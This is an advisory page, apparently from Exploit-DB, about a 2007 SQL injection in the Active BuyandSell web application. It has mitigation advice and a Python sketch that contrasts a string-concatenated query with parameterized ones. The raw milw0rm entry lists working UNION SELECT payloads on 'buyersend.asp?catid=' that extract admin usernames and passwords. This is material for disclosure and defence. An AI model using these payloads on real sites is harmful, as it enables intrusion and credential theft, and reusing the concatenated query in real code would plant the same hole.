Vendor: Active BuyandSell
By: CyberGhost
CVSS: 7.5 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: Active BuyandSell
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Active BuyandSell Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection through the 'buyersend.asp' and 'admin.asp' pages. The 'catid' parameter of 'buyersend.asp' is placed into a database query without validation, so by manipulating it an attacker can execute arbitrary SQL queries and retrieve sensitive information such as admin credentials from the 'admins' table.

Mitigation:

To mitigate this vulnerability, the developer should validate input (for 'catid', enforce that the value is an integer) and use parameterized queries so that user-supplied values are bound as data rather than concatenated into SQL text. Additionally, it is recommended to regularly update the software to apply any available security patches.
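Added example, not code from the advisory or the vendor: a Python/sqlite3 sketch of the mitigation above. The in-memory schema (a 'categories' table and an 'admins' table with constructed rows) is an assumption standing in for the product's real database; the 'catid' lookup is shown string-concatenated (the defect class described) beside a parameterized and type-checked version.

```python
import sqlite3


def build_demo_db():
    """Constructed stand-in for the product's database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE categories (catid INTEGER, name TEXT);
        CREATE TABLE admins (adminname TEXT, password TEXT);
        INSERT INTO categories VALUES (1, 'Electronics');
        INSERT INTO admins VALUES ('constructed_admin', 'constructed_secret');
        """
    )
    return conn


def lookup_category_vulnerable(conn, catid):
    # Defect: the request parameter becomes part of the SQL text, so a
    # UNION appended to catid reads other tables (the advisory's finding).
    sql = f"SELECT name FROM categories WHERE catid={catid}"
    return [row[0] for row in conn.execute(sql)]


def lookup_category_parameterized(conn, catid):
    # Binding alone: the whole value is compared to catid as data, so
    # injected SQL never reaches the parser, even without a type check.
    sql = "SELECT name FROM categories WHERE catid=?"
    return [row[0] for row in conn.execute(sql, (catid,))]


def lookup_category_hardened(conn, catid):
    # Validation plus binding: reject anything that is not an integer
    # early, then bind the checked value as a parameter.
    try:
        catid_int = int(catid)
    except (TypeError, ValueError):
        raise ValueError("catid must be an integer")
    sql = "SELECT name FROM categories WHERE catid=?"
    return [row[0] for row in conn.execute(sql, (catid_int,))]
```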

Exploit-DB raw data:

#Title  : Active BuyandSell Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://www.activewebsoftwares.com/demoactivebuyandsell
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8

#Vuln.

#Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
#Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

# milw0rm.com [2007-03-23]